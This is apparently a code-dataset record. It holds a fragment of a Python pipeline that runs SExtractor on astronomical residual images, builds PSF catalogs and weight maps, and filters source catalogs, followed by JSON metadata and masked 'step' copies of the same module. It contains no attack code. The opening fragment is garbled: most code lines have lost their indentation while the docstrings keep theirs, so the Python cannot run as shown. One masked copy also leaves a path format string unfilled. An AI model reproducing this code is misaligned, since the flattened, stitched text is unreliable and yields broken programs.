data[6] = "CATALOG_NAME" + " " + psf_loc + "/" + name + ".cat" + "\n"
data[44] = "PIXEL_SCALE" + " " + str(pixscale) + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0] -c %s" % (i, config_loc))
x += 1
per = float(x)/float(len(images)) * 100
print("\t %.1f%% sextracted..." % (per))
print("-> SExtracted %d images, catalogues placed in 'psf' directory\n" % (len(images)))
else:
print("\n-> Error: Problem with number of template images\n")
sys.exit()
return images
def sextractor_psf_sim(location, image):
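    '''
    creates the PSFEx input catalog (.cat) for a single fake image
    '''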
psf_loc = location + "/psf"
data = location + "/data"
check = os.path.exists(psf_loc)
length = len(data) + 1
if check == False:
os.system("mkdir %s" % (psf_loc))
initialize.create_configs(location)
config_loc = location + '/configs/psf.sex'
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[9] = "PARAMETERS_NAME" + " " + location + "/configs/default.psfex" + "\n"
data[20] = "FILTER_NAME" + " " + location + "/configs/default.conv" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
print("\n-> Creating PSF catalog of fake image...")
name = image[length:-5]
with open(config_loc, 'r') as config:
data = config.readlines()
config.close()
data[6] = "CATALOG_NAME" + " " + psf_loc + "/" + name + ".cat" + "\n"
with open(config_loc, 'w') as config:
config.writelines(data)
config.close()
os.system("sextractor %s[0] -c %s" % (image, config_loc))
def weight_map(image):
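    '''
    converts the mask extension of an image into a SExtractor weight map (1 for good pixels, 0 for masked pixels)
    '''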
hdu = fits.open(image)
hduMask = hdu[1].data
    # good pixels (mask value 0) get weight 1.0, masked pixels get weight 0.0
    weightMap = np.logical_not(hduMask).astype(float)
hdu.close()
return weightMap
def src_join(location):
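    '''
    concatenates the per-image catalogs in 'sources/temp' into 'sources/sources.txt', heading each block with its image name, then removes the temp directory
    '''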
source_loc = location + '/sources'
temp_source_loc = source_loc + '/temp'
temp_source_files = glob.glob(temp_source_loc + '/*.txt')
image_names = filters.get_image_names(location)
for file in temp_source_files:
with open(file, 'r') as fl:
data = fl.readlines()
        # prepend the image name (temp catalog file name with 'txt' -> 'fits') as a header line
        data = [str(file.replace('txt','fits')[len(source_loc)+6:]) + '\n'] + data
data.append("\n\n\n")
with open(source_loc + '/sources.txt', 'a+') as s:
if data[0] not in image_names:
s.writelines(data)
os.remove(file)
try:
os.rmdir(temp_source_loc)
except:
print("-> Error: Problem removing temp directory in '/sources'")
def filter_sources(location, mask_sources=False):
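    '''
    removes non PSF-like and divot-like detections from the source catalogs; optionally masks the remaining sources in the residual images
    '''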
print("\n-> Filtering out non PSF-like sources...")
filters.spread_model_filter(location)
    print("-> Filtering out divot-like detections...")
images = glob.glob(location + '/data/*_A_.fits')
for i in images:
indices = filters.divot(i)
filters.update_filtered_sources(location, indices)
residuals = glob.glob("%s/residuals/*_residual_.fits" % (location))
if mask_sources == True:
for r in residuals:
filters.mask_sources_image(r)
def MR_filter_sources(location):
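    '''
    prepends the image name to the master residual catalog, filters out non PSF-like and divot-like detections, and writes the total source list
    '''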
with open("%s/sources/MR_sources.txt" % (location), 'r') as MR_src:
MR_lines = MR_src.readlines()
MR_lines.insert(0, "MR.fits\n")
with open("%s/sources/MR_sources.txt" % (location), 'w+') as MR_src:
for line in MR_lines:
MR_src.write(line)
MR_loc = "%s/residuals/MR.fits" % (location)
print("\n-> Filtering out non PSF-like sources in master residual...")
filters.spread_model_filter(location, MR=True)
    print("-> Filtering out divot-like detections in master residual...")
indices = filters.divot(MR_loc, MR=True)
filters.update_filtered_sources(location, indices, MR=True)
filters.write_total_sources(location)
def append_negative_sources(residual, MR=False):
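    '''
    appends sources detected in the negated image (the '_2' catalog) to the corresponding main catalog, then deletes the '_2' catalog
    '''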
location = residual.split('/')[:-2]
location = '/'.join(location)
name = residual.split('/')[-1]
name = name.replace('.fits', '')
if MR == True:
with open("%s/sources/%s_sources_2.txt" % (location, name), 'r') as neg_sources:
lines = neg_sources.readlines()
with open("%s/sources/%s_sources.txt" % (location, name), 'a') as sources:
for l in lines:
if l[0] != '#':
sources.write(l)
os.remove("%s/sources/%s_sources_2.txt" % (location, name))
else:
with open("%s/sources/temp/%s_2.txt" % (location, name), 'r') as neg_sources:
lines = neg_sources.readlines()
with open("%s/sources/temp/%s.txt" % (location, name), 'a') as sources:
for l in lines:
if l[0] != '#':
sources.write(l)
os.remove("%s/sources/temp/%s_2.txt" % (location, name))
|
normal
|
{
"blob_id": "6f5eda426daf5db84dc205f36ec31e9076acb8ee",
"index": 8971,
"step-1": "<mask token>\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' 
% per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as 
config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\n<mask token>\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l 
in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-2": "<mask token>\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of master residuals\n-> Could not finish SExtracting master residual\"\"\"\n )\n\n\ndef sextractor(location):\n \"\"\"\n runs SExtractor on all residual images\n \"\"\"\n x = 0\n sources = location + '/sources'\n residuals = location + '/residuals'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n length = len(residuals) + 1\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n images = glob.glob(residuals + '/*_residual_.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n 
config.close()\n print('-> Converting all residual masks into weight maps...\\n')\n for r in tqdm(images):\n weight = weight_map(r)\n hdu = fits.open(r, mode='update')\n data = hdu[0].data\n hdr = hdu[0].header\n try:\n if hdr['WEIGHT'] == 'N':\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n except KeyError:\n hdr.set('WEIGHT', 'Y')\n hduData = fits.PrimaryHDU(data, header=hdr)\n hduWeight = fits.ImageHDU(weight)\n hduList = fits.HDUList([hduData, hduWeight])\n hduList.writeto(r, overwrite=True)\n hdu.close()\n try:\n if fits.getval(r, 'NORM') == 'N':\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n except KeyError:\n fits.setval(r, 'NORM', value='Y')\n MR.normalize(r)\n print('\\n-> SExtracting residual images...')\n for i in images:\n name = i[length:-5]\n data_name = location + '/data/' + name.replace('residual_', ''\n ) + '.fits'\n FWHM = psf.fwhm(data_name)\n im_hdu = fits.open(data_name)\n im_header = im_hdu[0].header\n saturate = im_header['SATURATE']\n pixscale = im_header['PIXSCALE']\n im_hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-9\n ] + '.psf' + '\\n'\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % i + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (i, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(i) * -1, header=fits.\n getheader(i))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(i, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits' % location)\n os.system(\n 'sextractor %s/residuals/temp.fits[0]> %s/temp/%s_2.txt -c %s' %\n (location, sources, name, config_loc))\n append_negative_sources(i)\n os.remove('%s/residuals/temp.fits' % location)\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' 
% per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'sources' directory\\n\" %\n len(images))\n print('-> Filtering source catalogs...\\n')\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_sim(image):\n location = image.split('/')[:-2]\n location = '/'.join(location)\n sources = location + '/sources'\n check = os.path.exists(sources)\n check_temp = os.path.exists(sources + '/temp')\n if check == False:\n os.system('mkdir %s' % sources)\n os.system('mkdir %s/temp' % sources)\n elif check_temp == False:\n os.system('mkdir %s/temp' % sources)\n initialize.create_configs(location)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting fake image...')\n name = image.split('/')[-1]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[106] = 'PSF_NAME' + ' ' + location + '/psf/' + name[:-5\n ] + '.psf' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/temp/%s.txt -c %s' % (image, sources,\n name, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(image) * -1, header=fits.\n getheader(image))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(image, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/temp.fits')\n os.system('sextractor %s/residuals/temp.fits[0]> %s/temp/%s.txt -c %s' %\n (location, sources, name, config_loc))\n os.remove('%s/residuals/temp.fits' % location)\n src_join(location)\n filter_sources(location)\n\n\ndef sextractor_psf(location):\n x = 0\n psf_loc = location + '/psf'\n data = location + '/data'\n templates = location + '/templates'\n check = os.path.exists(psf_loc)\n if check == False:\n os.system('mkdir %s' % psf_loc)\n temps = glob.glob(templates + '/*.fits')\n images = glob.glob(data + '/*_A_.fits')\n for t in temps:\n images.append(t)\n cats = glob.glob(location + '/psf/*.cat')\n images_names = [i.split('/')[-1][:-5] for i in images]\n cats_names = [c.split('/')[-1][:-4] for c in cats]\n imageCats = [im for im in images_names if im not in cats_names]\n images = []\n if temps == []:\n temps.append('')\n for imcats in imageCats:\n if imcats == temps[0].split('/')[-1][:-5]:\n images.append(temps[0])\n else:\n images.append(location + '/data/' + imcats + '.fits')\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[19\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalogs...')\n if len(temps) == 1:\n for i in images:\n name = i.split('/')[-1][:-5]\n hdu = fits.open(i)\n hdr = hdu[0].header\n pixscale = hdr['PIXSCALE']\n hdu.close()\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6] = ('CATALOG_NAME' + ' ' + psf_loc + '/' + name +\n '.cat' + '\\n')\n data[44] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n with open(config_loc, 'w') as 
config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (i, config_loc))\n x += 1\n per = float(x) / float(len(images)) * 100\n print('\\t %.1f%% sextracted...' % per)\n print(\n \"-> SExtracted %d images, catalogues placed in 'psf' directory\\n\" %\n len(images))\n else:\n print('\\n-> Error: Problem with number of template images\\n')\n sys.exit()\n return images\n\n\ndef sextractor_psf_sim(location, image):\n psf_loc = location + '/psf'\n data = location + '/data'\n check = os.path.exists(psf_loc)\n length = len(data) + 1\n if check == False:\n os.system('mkdir %s' % psf_loc)\n initialize.create_configs(location)\n config_loc = location + '/configs/psf.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.psfex' + '\\n')\n data[20\n ] = 'FILTER_NAME' + ' ' + location + '/configs/default.conv' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> Creating PSF catalog of fake image...')\n name = image[length:-5]\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[6\n ] = 'CATALOG_NAME' + ' ' + psf_loc + '/' + name + '.cat' + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0] -c %s' % (image, config_loc))\n\n\ndef weight_map(image):\n hdu = fits.open(image)\n hduMask = hdu[1].data\n zeroMask = np.zeros(hduMask.shape)\n weightMap = np.logical_not(np.logical_or(hduMask, zeroMask)).astype(float)\n hdu.close()\n return weightMap\n\n\ndef src_join(location):\n source_loc = location + '/sources'\n temp_source_loc = source_loc + '/temp'\n temp_source_files = glob.glob(temp_source_loc + '/*.txt')\n image_names = filters.get_image_names(location)\n for file in temp_source_files:\n with open(file, 'r') as fl:\n data = fl.readlines()\n data = [str(file.replace('txt', 'fits')[len(source_loc) + 6:]) + '\\n'\n ] + data\n data.append('\\n\\n\\n')\n with open(source_loc + '/sources.txt', 'a+') as s:\n if data[0] not in image_names:\n s.writelines(data)\n os.remove(file)\n try:\n os.rmdir(temp_source_loc)\n except:\n print(\"-> Error: Problem removing temp directory in '/sources'\")\n\n\ndef filter_sources(location, mask_sources=False):\n print('\\n-> Filtering out non PSF-like sources...')\n filters.spread_model_filter(location)\n print('-> Filtering out diveted detections...')\n images = glob.glob(location + '/data/*_A_.fits')\n for i in images:\n indices = filters.divot(i)\n filters.update_filtered_sources(location, indices)\n residuals = glob.glob('%s/residuals/*_residual_.fits' % location)\n if mask_sources == True:\n for r in residuals:\n filters.mask_sources_image(r)\n\n\n<mask token>\n\n\ndef append_negative_sources(residual, MR=False):\n location = residual.split('/')[:-2]\n location = '/'.join(location)\n name = residual.split('/')[-1]\n name = name.replace('.fits', '')\n if MR == True:\n with open('%s/sources/%s_sources_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/%s_sources.txt' % (location, name), 'a'\n ) as sources:\n for l in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/%s_sources_2.txt' % (location, name))\n else:\n with open('%s/sources/temp/%s_2.txt' % (location, name), 'r'\n ) as neg_sources:\n lines = neg_sources.readlines()\n with open('%s/sources/temp/%s.txt' % (location, name), 'a') as sources:\n for l 
in lines:\n if l[0] != '#':\n sources.write(l)\n os.remove('%s/sources/temp/%s_2.txt' % (location, name))\n",
"step-3": "<mask token>\n\n\ndef sextractor_MR(location, MR_method='swarp', use_config_file=True):\n \"\"\"\n runs SExtractor on master residual\n \"\"\"\n check_MR = glob.glob('%s/residuals/MR.fits' % location)\n if check_MR == []:\n print('-> Master residual does not exist, creating it first...')\n if use_config_file == True:\n MR_method = initialize.get_config_value('MR_method')\n MR.MR(location, MR_method)\n master_res = glob.glob('%s/residuals/MR.fits' % location)\n temp = glob.glob('%s/templates/*.fits' % location)\n if len(master_res) == 1:\n if len(temp) == 1:\n MR = master_res[0]\n template = temp[0]\n temp_name = template.split('/')[-1]\n temp_name = temp_name[:-5]\n MR_hdu = fits.open(MR)\n MR_header = MR_hdu[0].header\n saturate = MR_header['SATURATE']\n temp_hdr = fits.getheader(template)\n pixscale = temp_hdr['PIXSCALE']\n MR_hdu.close()\n FWHM = psf.fwhm_template(template)\n config_loc = location + '/configs/default.sex'\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[9] = ('PARAMETERS_NAME' + ' ' + location +\n '/configs/default.param' + '\\n')\n data[20] = ('FILTER_NAME' + ' ' + location +\n '/configs/default.conv' + '\\n')\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n print('\\n-> SExtracting master residual...')\n with open(config_loc, 'r') as config:\n data = config.readlines()\n config.close()\n data[51] = 'SATUR_LEVEL' + ' ' + str(saturate) + '\\n'\n data[62] = 'SEEING_FWHM' + ' ' + str(FWHM) + '\\n'\n data[106] = ('PSF_NAME' + ' ' + location + '/psf/' +\n temp_name + '.psf' + '\\n')\n data[58] = 'PIXEL_SCALE' + ' ' + str(pixscale) + '\\n'\n data[32] = 'WEIGHT_IMAGE' + ' ' + '%s[1]' % MR + '\\n'\n with open(config_loc, 'w') as config:\n config.writelines(data)\n config.close()\n os.system('sextractor %s[0]> %s/sources/MR_sources.txt -c %s' %\n (MR, location, config_loc))\n temp_hdu_data = fits.PrimaryHDU(fits.getdata(MR) * -1, header=\n fits.getheader(MR))\n temp_hdu_mask = fits.ImageHDU(fits.getdata(MR, 1))\n temp_hdu_list = fits.HDUList([temp_hdu_data, temp_hdu_mask])\n temp_hdu_list.writeto('%s/residuals/MR_neg.fits' % location)\n os.system(\n 'sextractor %s/residuals/MR_neg.fits[0]> %s/sources/MR_sources_2.txt -c %s'\n % (location, location, config_loc))\n append_negative_sources(MR, MR=True)\n MR_filter_sources(location)\n else:\n print(\n \"\"\"-> Error: Problem with number of template images\n-> Could not finish SExtracting master residual\"\"\"\n )\n else:\n print(\n \"\"\"-> Error: Problem with number of 